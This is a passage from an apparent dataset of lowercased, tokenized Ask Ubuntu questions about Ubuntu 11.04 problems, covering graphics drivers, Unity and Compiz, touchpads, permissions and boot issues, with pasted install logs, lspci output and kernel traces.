] /usr/share/ati/fglrx-install.log contents : unloading radeon module ... error : module radeon is in use unloading drm module ... error : module drm is in use by radeon , ttm , drm_kms_helper [ message ] kernel module : trying to install a precompiled kernel module . [ message ] kernel module : precompiled kernel module version mismatched . [ message ] kernel module : found kernel module build environment , generating kernel module now . amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko .a . ? ? *.symvers make -c /lib/modules/2.6.38-8-generic/build subdirs=/lib/modules/fglrx/build_mod/2.6.x modules make1 : entering directory /usr/src/linux-headers-2.6.38-8-generic' cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/firegl_public.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_acpi.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_agp.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_debug.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_ioctl.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_io.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_pci.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_str.o cc [ m ] /lib/modules/fglrx/build_mod/2.6.x/kcl_wait.o ld [ m ] /lib/modules/fglrx/build_mod/2.6.x/fglrx.o building modules , stage 2 . modpost 1 modules cc /lib/modules/fglrx/build_mod/2.6.x/fglrx.mod.o ld [ m ] /lib/modules/fglrx/build_mod/2.6.x/fglrx.ko make [ 1 ] : leaving directory /usr/src/linux-headers-2.6.38-8-generic' build succeeded with return value 0 duplicating results into driver repository ... done . you must change your working directory to /lib/modules/fglrx and then call ./make_install.sh in order to install the built module . - recreating module dependency list - trying a sample load of the kernel modules failed . [ error ] kernel module : reboot required . [ reboot ] kernel module : update-initramfs when i run make_install.sh ... ashish @ ashish-pc : ~/downloads $ cd /lib/modules/fglrx ashish @ ashish-pc : /lib/modules/fglrx $ ./make_install.sh ./make_install.sh : line 24 : /etc/ati/inst_path_default : permission denied ./make_install.sh : line 25 : /etc/ati/inst_path_override : permission denied you must be logged in as root to run this script . ashish @ ashish-pc : /lib/modules/fglrx $ sudo ./make_install.sh [ sudo ] password for ashish : - recreating module dependency list - trying a sample load of the kernel modules fatal : error inserting fglrx ( /lib/modules/2.6.38-8-generic/kernel/drivers/char/drm/fglrx.ko ) : no such device failed . ashish @ ashish-pc : /lib/modules/fglrx $
42092	windows disappear from panel when on alternate dual monitor	is this a bug ? i just upgraded to natty and hated the unity desktop , it still needs work , so now i log into the ubuntu classic desktop to get the traditional gnome panel . the problem is that when i have a window on my right monitor it does not show up in the panel . notice that vim is on the left , it shows up in the task area , so does the help , which spans . chrome which is entirely on the right does not show up . is this a bug and how can i fix it ?
42093	reset synaptics touchpad	i 've got a samsung series 9 notebook ( 900x3a ) running ubuntu natty . it 's running absolutely smoothly except for some times when the touch pad gets `` hiccups '' and appears to recognize an additional finger blocking it for normal mouse moves . toggling the touch pad using the function keys does not help , suspending and resuming it does , tough . is there an easier way to reset the synaptics driver than going to standby mode and waking the notebook up again ?
42096	fresh install of 11.04x64 - display ( compiz ) constantly failing	i have a brand new hp g62x , 11.04 64bit installed fresh . i have only been using gnome classic rather than unity but i do n't think that effects this issue . i have been searching here and ubuntuforums but have n't found a solution . i 'm not exactly sure what keywords i should be using . the problem is compiz seems to fails often . the screen flickers for a moment then recovers . ( sometimes ) usually what causes it is - drag and drop anything pop up dialog windows menu options that drop down and often simply moving a window on screen sometimes when compiz does n't restart itself i am forced to drop to the console ( ctrl+alt+f1 ) to restart gdm . i ca n't imagine that i am the only one with this issue . here 's a bit of the lspci -v $ 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 1425 flags : bus master , fast devsel , latency 0 , irq 42 memory at d0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4050 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 any ideas on how to clear this up ? or point me to some links that will send me in the right direction ? sidenote : i have a very similar issue on my desktop machine . the graphcs ran flawlessly from 8.04-10.10 until the upgrade to 11.04 . i thought the issue was with the nvidia drivers but now that i 'm having the same problem here i doubt it .
42098	how can i get plugins for emesene 2 ?	emesene 2 is cool , but it lacks the additional plugins present in the previous version ( see screenshot below ; the plugins tab is empty in emesene 2 ) . so where can i find plugins to download ? is there a way to copy the plugins from emesene 1 to emesene 2 ? if not , any suggestion for another client for msn has all the plugins needed ?
42099	can multiple files be selected , then uploaded to u1 simultaneously ?	have i just not figured out yet how to mark and upload [ multiple ] files , or must they be uploaded only one at a time ? i would like to have a ubuntu one folder on my machines and put files in it , then upload them all in one swell foop . is this not possible ? if the answer is 'no ' is it at least in the works ?
42104	any chance an exception could be made for a libreoffice 3.4 update -- so natty can get global menus ?	just wondering if we will all have to wait 6 months to get global menu support in libreoffice ? it 'd be nice if ubuntu made one exception and updated libreoffice to 3.4 so we could get global menus for it .
42106	tmpfs vs. ext4 ramdisk	i would like to know which of both is faster ; a tmpfs or a ext4 ramdisk . if someone knows a good way to benchmark disk perfomance on ubuntu , i will gladly do the test myself and post the results . best regards tom
42115	ca n't play stunt rally	everytime i try to start stunt rally via the command prompt i get following error.. ./stuntrally : error while loading shared libraries : libogremain.so.1.7.2 : can not open shared object file : no such file or directory any ideas ? ? ? i am running natty 32bit
42122	ca n't copy from clipboard to any java applet	the clipboard does not work with any java applet on my install of ubuntu 10.04 . i am using the icedtea plugin . i can not copy/paste from ubuntu to java in either direction . however , icedtea can copy to itself - that is , i can cut text from a java applet and paste it into another part of that same applet . other than this , clipboard support is fine across the rest of ubuntu . is there anything i can do to fix this ?
42123	how do i right click with a magic trackpad ?	i ca n't seem to right click with my magic trackpad on ubuntu 11.04 . on maverick , a two-finger tap would do , but in natty it seems to be assigned to middle click , and three-finger tap is assigned to dragging a window . my magic trackpad is basically unusable because of this , with many programs requiring right click and very few even using the middle click ( still , i 'd like to have both . maybe have three-finger tap as middle click and four-finger drag window ? )
42125	how do i get classic ( not unity ) desktop from run from the live cd ?	have been running 10.04lts from the cd only and like it . have no intention of ever installing ubuntu - former freespire user driven to ubuntu by the lack of ability to update firefox in freespire . i want a system that accesses no drives unless i tell it to and saves absolutely nothing i have not seen and approved of . burned 11.04 and it seems to run , but it 's useless to me if i can not get to the older classic style - i do n't want to learn how to drive again every year or so - that is one thing that drove me away from windows . for now , back to the 10.04 disk .
42128	reduce touchpad touch sensitivity or disable tap-to-click unless key is pressed	is there a way to reduce the sensitivity to touch of the touchpad ? i keep accidentally clicking while typing ( disable while typing seems to have little use ) . other possible solutions to my issue : hold a key to enable click of the touchpad . this way i can do work while holding key , otherwise it becomes inactive ( ideal ) . i can not disable tough-to-click since the buttons on the touchpad are touch-enabled and very hard to press . you can imagine how painful/inaccurate that setup becomes .
42131	how to add emblems to nautilus	is there a way to add custom emblems to folders in nautilus ? the emblems like music , documents and the check mark on the ubuntu one folder are very nice and i would like to add a few custom ones . for example , audiobook .
42132	unity file dialog & window resizing in general	i 've finally ditched windows 7 for ubuntu 11.04 , as unity seems mature enough for my needs . there is however one little point of improvement : as a netbook user with a 1024x600 resolution , i see that most application dialogs are thinking they 're still in 1024x768 , ans many of them ca n't be resized , and when maximized , half of the dialog is shown and it 's not possible to scroll up/down to see the rest , which can impair the usage . other than that , kudos to the interface team ; unity looks innovative , has taken the best of some uis while developing its own rules ( such as cleverly auto-hiding the dock to gain full width , which was a much needed feature ) . something i also liked & found quite useful was the mac expose-like feature when clicking on open application icons . if there was an ubuntu release convincing enough to ditch windows , i 'd say natty was it . congratulations !
42133	how to repair a flashing cursor on boot after a forced shutdown ?	a program started misbehaving , and quickly ate up all 4gb of my ram and 2gb of my swap . this meant the system came to a crawl . so i forced a shutdown . now , when i reboot , i would normally get a grub screen , or an ubuntu screen , but i only get a flashing cursor , after the post screen . preferably without reinstalling , what can i do to fix this ? i have a live cd around somewhere which i could boot from . oh , and i 'm using 10.04 .
42138	is there any program to detect duplicate images ?	the title says all : is there any program to detect duplicate images ? regards .
42140	how can i get an indicator icon for new updates ?	i don’t want update manager popping up on its own , but i do want to be notified that there are new updates . in older ubuntu releases ( i don’t remember how old ) , an icon would display in the notification area if there were updates available , with a different look if there were security updates . i could either bring up a terminal and do sudo apt-get upgrade or just click the icon to bring up update manager . in 10.10 i ran this command to get that behavior back : gconftool -s -- type bool /apps/update-notifier/auto_launch false that was working great , but now that i’m running 11.04 with unity , nothing shows up at all . if i do sudo apt-get upgrade in terminal it installs updates if there are any , but there aren’t always updates and i’d like the nice non-invasive reminder icon back if at all possible . i’ve read about unity hiding some indicator icons so maybe that’s what’s happening here ?
42141	when i select and deselect some file on my desktop , an orange line appears near the file name	when i select and deselect some file on my desktop , an orange line appears near the file name . why does this happen ?
42144	set up a serial-to-ethernet converter with a virtual serial port	i have a '3one data ' brand serial-to ethernet converter , that plugs into a serial device at one end , and allows bidirectional communications with the device over an ethernet connection , like this : there is supposedly a way to set up a virtual serial port in ubuntu , which maps to the ip and port of this device and allows transparent communication with the real serial device on the other end . unfortunately there was no linux documentation accompanying this device , despite the fact that linux support was prominently advertised . i am struggling with setting up this virtual serial port in ubuntu , which i believe should be achieved through the ttyd command . however , with the device connected ( i can telnet into it directly ) , if i run : sudo ttyd -d /dev/ttyp1 192.168.1.25 50000 -b 115200 -p 8nc0 my understanding is that a new virtual serial device should be created , /dev/ttyp1 , but this does n't happen . the ttyd command above does not throw any errors .
42151	how to create a bootable install on usb with the minimal cd ?	how can i create a bootable installer on usb with ubuntu 11 ?
42152	where is syslog.conf ?	i tried to move my stuff from centos to ubuntu . here is a problem i met : i would like find the corresponding centos /etc/syslog.conf file in ubuntu ? basically , the file is used to control where those syslog files go ?
42153	how can i set up my displaylink usb video adapter without having to create and edit an xorg.conf ?	ideally , i 'd like to be able to plug it in , be prompted for apt to get the necessary driver package , and just have to logoff/login or restart to get the monitor connected to the displaylink ( or any usb display device , e.g . lilliput ) to be a part of my normal desktop , including my other two monitors acting as a single desktop . what needs to happen in order for this process to be as simple as this ?
42156	is there a way to change the icon of a running application on the gnome panel ?	i would like to change the icon of running applications like opera . when running both opera next and opera , the two versions both appear at the top panel , but both are in red . i want to change the opera next icon so it is easier to identify when the windows are minimized . is there a way to change the icons that show for running applications in the panel ?
42157	why is n't lmroman17 font available in libreoffice ?	lmroman17 is installed by default in ubuntu . the font file is lmr17.pfb . i can use this font in the gimp , but not libreoffice writer . the strange thing is that lmroman10 ( lmr10.pfb ) is available in libreoffice . what 's going on ?
42162	compile gedit 3 to use on gnome 2	i 'm on gnome 2.32.1 ( ubuntu 11.04 ) , and i would like to use gedit 3 on my current desktop environment . to achieve this , i think i could compile gedit 3 and its dependent libraries with a custom prefix , so it would not interfere with my current gnome 2 libraries , but i 'm not sure . thanks a lot .
42166	how to make the lock screen look like the login screen ?	is there any way to make the login screen from a locked session ( either by using ctrl+alt+l or from a screen timeout ) look like the login screen when you 're starting a new session ? i hate that everything on the lock screen aside from the password input is black .
42170	computer restarts instead of shutting down	my ubuntu 11.04 will not shutdown when i tell it to ; it will instead restart the computer .
42173	x breaks after installing compiz	i tried to install compiz after upgrading to 11.04 . now x does n't work anymore and i ca n't replace compiz with metacity , because i 'm not able to launch x. i restarted in recovery mode , but i 'm not able to reset x to use metacity . when i launch x ( startx ) , it does n't start , i just get a black screen .
42177	assign run command for all media files	currently totem/movie player opens and plays any type of media files , be it audio or video - is there a way to change that run command ? edit i am already aware of properties option from right-click 's context menu , but as i said , i want to change the run command for all items considered to be media files .
42178	ca n't right-click top menu bar	i wanted to move the top menu bar to the bottom of my desktop , rather than the top . every tutorial i saw told me to right-click it and select `` properties , '' but i simply can not right-click the menu bar . no matter where the cursor is , there is no response . no menu or anything . right-clicking works fine everywhere else . is there some hidden setting that 's preventing me from messing with it ?
42181	can not use up down to navigate terminal history	in my main ubuntu account i creating on install terminal works as expected , but in an account i created , i can not use up down keys to navigate history . also i cant seem to use ! ! to use last command ... below is what i get when using up down buttons $ ^ [ [ a^ [ [ a^ [ [ a^ [ [ b^ [ [ b
42189	how to move keys to `` login '' in seahorse ?	i want to move a few passwords into `` login '' in seahorse , so that i will authenticate them when i , well , login , but i ca n't drag n ' drop them and do n't know how to do this . anyone who knows ?
42190	apache server does n't start automatically	i installed apache a long time a go as part of setting up the development environment on my laptop . however , since i stopped it some months back , it no longer starts automatically on boot . i have this problem on my laptop at home and on my laptop at work . i both cases , i installed apache in ubuntu 10.10 some months ago , used it for several weeks without a glitch , but then one day i stopped it and now it no longer starts automatically . i tried running the update rc for it manually , but was told the init script is already in use . however , starting/restarting it manually with sudo service apache2 start/restart works fine . in both cases , i let it be until after the upgrade to 11.04 , because i hoped it would be solved by the new version . but it 's not ! i 'd be grateful if someone can tell me how to have apache start automatically once more .
42192	natty crashes randomly and jumps to login	sometimes when i work on natty 32bit the screen goes black and jumps to the login-screen . i do n't know how to reproduce this bug , but it seems it occurs when starting applications . anyone has a solution to this ? thanks !
42196	is there a way to restore all terminals at startup	i would like to know if there is a way to restore all terminals after a reboot ? the following thread refers to 'system > preferences > session' http : //ubuntuforums.org/showthread.php ? t=791504 which i understand is now 'system > preferences > startup applications ' for ubuntu 10.04+ in , startup application , if 'automatically remember running applications when logging out ' is checked , the terminals are restored with the correct directory . but the 'title ' set for each terminal resets to 'terminal ' . is there a way to restore the 'title ' attribute too ? thank you
42199	unity in 11.04 has crashed ( no launcher or dash access anymore )	i upgraded to ubuntu 11.04 with unity ( a very bad move ) and then installed advanced ccsm and deactivated the desktop wall and ticked the desktop cube . upon pressing ok , i can not access anything . not the dash nor the launcher ... nothing . i do not know what to do know ... i can not open the terminal . please help me ! i am new to ubuntu ... . only a month old user ... i sadly upgraded to 11.04 yesterday ... . if you 're reading this from a 10.10 ... . do not upgrade ... bad business .
42202	hyper does the same as super by default	under the keyboard â layouts â options , one has the ability to 'make caps lock an additional hyper ' . this is a good feature because i personally abhor caps lock and like additional shortcuts . unfortunately , i shortly discovered that hyper is set by default to do the same as super . this makes it annoying when hyper opens dash . under xmodmap , one sees that hyper and super are both set to the modifier mod4 and nothing is set to mod3 . i did some research to fix it and it is easily fixed by making a file called .xmodmaprc in ~ with : 'clear mod3 clear mod4 add mod4 = super_l add mod4 = super_r add mod3 = hyper_l ' in it . however , i would like to know why hyper is not set to mod3 by default . is there any advantage to this ? furthermore , if there is no adequate reason , is it possible that this may be fixed in the future ?
42204	`` apt-get -- print-uris '' to list uri for downloading extra functionality package for amarok , reqonk	hello i do not have internet connection at my home . so i use `` apt-get -- print-uris '' to list the http 's and take it to other pc with internet connection and use wget to download them . i am facing difficulty about how to list the http 's that amarok will download from for the extra functionality ( like mp3 codecs ) . kde deamon is showing me that these packages are needed for extra functionality of amarok but i do n't know how to list their http 's . `` apt-get -- print-uris upgrade '' does not list http 's need for amarok/reqonk .
42205	how to install package to a specific hard disk drive partition	by default apt-get installs packages in the drive that the ubuntu installation resides on . but can i install a package other than the ubuntu partition ? if i can , how to do it ?
42207	my newly added user can not write to folder	suppose i installed ubuntu with the user usr1 then i added usr2 . i then create a group grp1 where this 2 users are added . a folder is owned by usr1 and has group grp1 . but when i login as usr2 i can not write . the folder has permissions 755 ... usr2 @ kmserver : /media/data/www $ groups usr1 usr1 : grp1 ... usr2 @ kmserver : /media/data/www $ groups usr2 usr2 : grp1 ... usr2 @ kmserver : /media/data $ ls -l total 20 drwx -- -- -- 2 root root 16384 2011-05-12 10:53 lost+found drwxrwxr-x 2 grp1 grp1 4096 2011-05-12 15:15 www whats wrong ?
42209	is it possible to reset all folder permissions ?	i was wondering if it was possible to reset all the folders ' rights . i was having trouble when trying to install lamp on my ubuntu 11.04 installation , and i modified many permissions like /var /etc and i want to cancel everything i did and have permissions set to how they would be after a new install .
42210	expo shortcut < super > s does n't work in classic desktop	i have bound the < super > s key in the compizconfig settings manager but whenever i press the < super > s the power menu from indicator applet complete shows up : i can bind expo to any other key ( like < super > q ) and that works fine but i would really like to use < super > s because i am used to it and it 's the default in unity . i 've checked in keyboard shortcuts but the < super > s key ( super is called mod4 here ) is n't bound to anything . is there a way to stop the power menu from showing ? edit : i have noticed that the problem only occurs if i have the indciator applet complete or the indicator applet session in my panel .
42211	how to create unity indicators ?	i 'm interested in unity indicators , and wonder if there is any tutorial about how to program them . i can use the sources of the existing ones as last resort , but i 'd prefer a more friendly approach because my programming skills are quite limited .
42212	how to make banshee buffer my stream ?	i 've got a http stream installed on our server with mpd which streams ogg over http . if i connect with banshee to this station the buffer is always at 0.0 % and infrequently a little bit of the music gets skipped . ( like 1/10th of a second ) however , when the song switches , there 's a lot more skipping going on or banshee even loses the stream . here 's an image of the buffering in banshee : if i use different streams ( i 've only tried it with m3u over http streams . ) , the buffer fills up correctly . who is responsible that banshee does n't buffer my stream and how could i make it do this ?
42215	gnome keyring stops accepting password	i have encfs-encrypted partition on my system where i store important data . i also store gnome-keyring files there . so i log in , run cryptkeeper , enter my password and connect to wi-fi . gnome-keyring pops up , i enter my password . now , in 11.04 after 2-3 days gnome keyring wont accept my password and i have to overwrite the files from backup . in 10.10 this was just ok. where could be the problem ?
42217	logging out/back in sometimes freezes after login to blank wallpaper	hi i am running 11.04 on a dell inspiron 530 below i have pasted what hardware i have and some dmesg pasted info here is the problem : when i log out many times i can not seem to log back in again . it freezes without any panels appearing which i suspect is an issue with gdm ? i usually resort then to alt/print-screen and k to re-reboot and that mostly works and boots back to unity which then works wonderfully . i can not understand why this does not happen when i start the pc up from scratch but only seems to happen on logout-in or sometimes reboot . i am using only ubuntu on this pc also here is print out from lspci lspci 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 02 ) 00:19.0 ethernet controller : intel corporation 82562v-2 10/100 network connection ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 4 port sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801i ( ich9 family ) 2 port sata ide controller ( rev 02 ) 01:00.0 vga compatible controller : ati technologies inc rv610 video device [ radeon hd 2400 pro ] here is from lsusb : bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 003 : id 413c:2003 dell computer corp . keyboard bus 005 device 002 : id 0461:4d22 primax electronics , ltd bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 03f0:7804 hewlett-packard deskjet d1360 bus 004 device 002 : id 046d:089d logitech , inc. quickcam e2500 series bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub if it helps also here is the readout from dmesg : [ 5.965964 ] [ drm ] vga [ 5.965965 ] [ drm ] ddc : 0x7e50 0x7e50 0x7e54 0x7e54 0x7e58 0x7e58 0x7e5c 0x7e5c [ 5.965967 ] [ drm ] encoders : [ 5.965968 ] [ drm ] crt2 : internal_kldscp_dac2 [ 5.965969 ] [ drm ] connector 2 : [ 5.965970 ] [ drm ] dvi-i [ 5.965971 ] [ drm ] hpd1 [ 5.965973 ] [ drm ] ddc : 0x7e40 0x7e40 0x7e44 0x7e44 0x7e48 0x7e48 0x7e4c 0x7e4c [ 5.965974 ] [ drm ] encoders : [ 5.965975 ] [ drm ] crt1 : internal_kldscp_dac1 [ 5.965976 ] [ drm ] dfp1 : internal_lvtm1 [ 6.019898 ] [ drm ] internal thermal controller without fan control [ 6.019952 ] [ drm ] radeon : power management initialized [ 6.098623 ] [ drm ] fb mappable at 0xd0141000 [ 6.098625 ] [ drm ] vram apper at 0xd0000000 [ 6.098626 ] [ drm ] size 5324800 [ 6.098627 ] [ drm ] fb depth is 24 [ 6.098629 ] [ drm ] pitch is 5888 [ 6.098792 ] console : switching to colour frame buffer device 180x56 [ 6.098817 ] fb0 : radeondrmfb frame buffer device [ 6.098818 ] drm : registered panic notifier [ 6.098823 ] [ drm ] initialized radeon 2.8.0 20080528 for 0000:01:00.0 on minor 0 [ 6.437588 ] usbcore : registered new interface driver snd-usb-audio [ 6.533185 ] hda intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 6.533222 ] hda intel 0000:00:1b.0 : irq 43 for msi/msi-x [ 6.533242 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 6.608241 ] type=1400 audit ( 1305191778.439:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=499 comm= '' apparmor_parser '' [ 6.608870 ] type=1400 audit ( 1305191778.439:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=499 comm= '' apparmor_parser '' [ 6.609060 ] type=1400 audit ( 1305191778.439:4 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=447 comm= '' apparmor_parser '' [ 6.609274 ] type=1400 audit ( 1305191778.439:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=499 comm= '' apparmor_parser '' [ 6.609688 ] type=1400 audit ( 1305191778.439:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=447 comm= '' apparmor_parser '' [ 6.610094 ] type=1400 audit ( 1305191778.439:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=447 comm= '' apparmor_parser '' [ 6.756553 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5 [ 9.924552 ] usblp0 : usb bidirectional printer dev 3 if 0 alt 0 proto 2 vid 0x03f0 pid 0x7804 [ 9.924903 ] usbcore : registered new interface driver usblp [ 12.538889 ] ppdev : user-space parallel port driver [ 12.876847 ] type=1400 audit ( 1305191784.707:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=828 comm= '' apparmor_parser '' [ 12.877582 ] type=1400 audit ( 1305191784.707:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=828 comm= '' apparmor_parser '' [ 12.898935 ] type=1400 audit ( 1305191784.727:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=831 comm= '' apparmor_parser '' [ 12.899575 ] type=1400 audit ( 1305191784.727:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=831 comm= '' apparmor_parser '' [ 12.899975 ] type=1400 audit ( 1305191784.727:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=831 comm= '' apparmor_parser '' [ 14.000492 ] type=1400 audit ( 1305191785.831:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=830 comm= '' apparmor_parser '' [ 14.004217 ] type=1400 audit ( 1305191785.835:14 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=837 comm= '' apparmor_parser '' [ 14.004956 ] type=1400 audit ( 1305191785.835:15 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=837 comm= '' apparmor_parser '' [ 14.360859 ] type=1400 audit ( 1305191786.191:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld-akonadi '' pid=838 comm= '' apparmor_parser '' [ 14.361285 ] type=1400 audit ( 1305191786.191:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld-akonadi///usr/sbin/mysqld '' pid=838 comm= '' apparmor_parser '' [ 15.144178 ] e1000e 0000:00:19.0 : irq 41 for msi/msi-x [ 15.200046 ] e1000e 0000:00:19.0 : irq 41 for msi/msi-x [ 15.200263 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 16.387139 ] usb 4-2 : usbfs : interface 0 claimed by usblp while 'usb ' sets config # 1 [ 16.668752 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : none [ 16.668757 ] e1000e 0000:00:19.0 : eth0 : 10/100 speed : disabling tso [ 16.668889 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 20.584348 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 [ 26.878702 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 [ 27.504006 ] eth0 : no ipv6 routers present [ 65.681147 ] show_signal_msg : 12 callbacks suppressed [ 65.681152 ] python [ 1732 ] : segfault at 1b0 ip b66c89ef sp bfa2a820 error 4 in libdbus-1.so.3.5.4 [ b669e000+3b000 ] [ 72.109525 ] python [ 1839 ] : segfault at 8b32002 ip b74a06bd sp b5d75928 error 4 in libc-2.13.so [ b7389000+15a000 ] [ 74.574963 ] process `skype ' is using obsolete setsockopt so_bsdcompat [ 440.860838 ] nautilus [ 1469 ] : segfault at 20 ip b6c1dfc2 sp bf8d6ba0 error 4 in libgobject-2.0.so.0.2800.6 [ b6beb000+45000 ] [ 468.597037 ] sysrq : sak [ 468.597055 ] sak : killed process 2320 ( xorg ) : task_session ( p ) ==tty- > session [ 468.597195 ] sak : killed process 2320 ( xorg ) : task_session ( p ) ==tty- > session [ 474.533041 ] sysrq : sak [ 474.533057 ] sak : killed process 2531 ( xorg ) : task_session ( p ) ==tty- > session [ 474.533178 ] sak : killed process 2531 ( xorg ) : task_session ( p ) ==tty- > session [ 474.980661 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 480.884016 ] radeon 0000:01:00.0 : gpu lockup cp stall for more than 10052msec [ 480.884020 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 480.884043 ] warning : at /build/buildd/linux-2.6.38/drivers/gpu/drm/radeon/radeon_fence.c:248 radeon_fence_wait+0x2ea/0x360 [ radeon ] ( ) [ 480.884046 ] hardware name : inspiron 530 [ 480.884049 ] gpu lockup ( waiting for 0x0000a2a4 last fence id 0x0000a29b ) [ 480.884051 ] modules linked in : binfmt_misc parport_pc ppdev usblp snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_usb_audio snd_pcm snd_hwdep snd_usbmidi_lib snd_seq_midi snd_seq_midi_event snd_rawmidi snd_seq gspca_zc3xx snd_timer snd_seq_device gspca_main videodev radeon ttm drm_kms_helper psmouse serio_raw snd soundcore snd_page_alloc dcdbas drm lp i2c_algo_bit parport usbhid hid floppy e1000e [ 480.884083 ] pid : 2666 , comm : xorg not tainted 2.6.38-8-generic-pae # 42-ubuntu [ 480.884086 ] call trace : [ 480.884094 ] [ < c1058ce2 > ] ? warn_slowpath_common+0x72/0xa0 [ 480.884112 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 480.884130 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 480.884134 ] [ < c1058db3 > ] ? warn_slowpath_fmt+0x33/0x40 [ 480.884151 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 480.884158 ] [ < c1076c70 > ] ? autoremove_wake_function+0x0/0x50 [ 480.884175 ] [ < f88f57c1 > ] ? radeon_sync_obj_wait+0x11/0x20 [ radeon ] [ 480.884184 ] [ < f84ae719 > ] ? ttm_bo_wait+0xd9/0x170 [ ttm ] [ 480.884204 ] [ < f890d8c2 > ] ? radeon_gem_wait_idle_ioctl+0x82/0xe0 [ radeon ] [ 480.884218 ] [ < f8788db1 > ] ? drm_ioctl+0x1e1/0x470 [ drm ] [ 480.884241 ] [ < f890d840 > ] ? radeon_gem_wait_idle_ioctl+0x0/0xe0 [ radeon ] [ 480.884247 ] [ < c1013b00 > ] ? restore_i387_xstate+0xf0/0x210 [ 480.884251 ] [ < c113251c > ] ? rw_verify_area+0x6c/0x130 [ 480.884262 ] [ < f8788bd0 > ] ? drm_ioctl+0x0/0x470 [ drm ] [ 480.884267 ] [ < c1141ecb > ] ? do_vfs_ioctl+0x7b/0x2e0 [ 480.884270 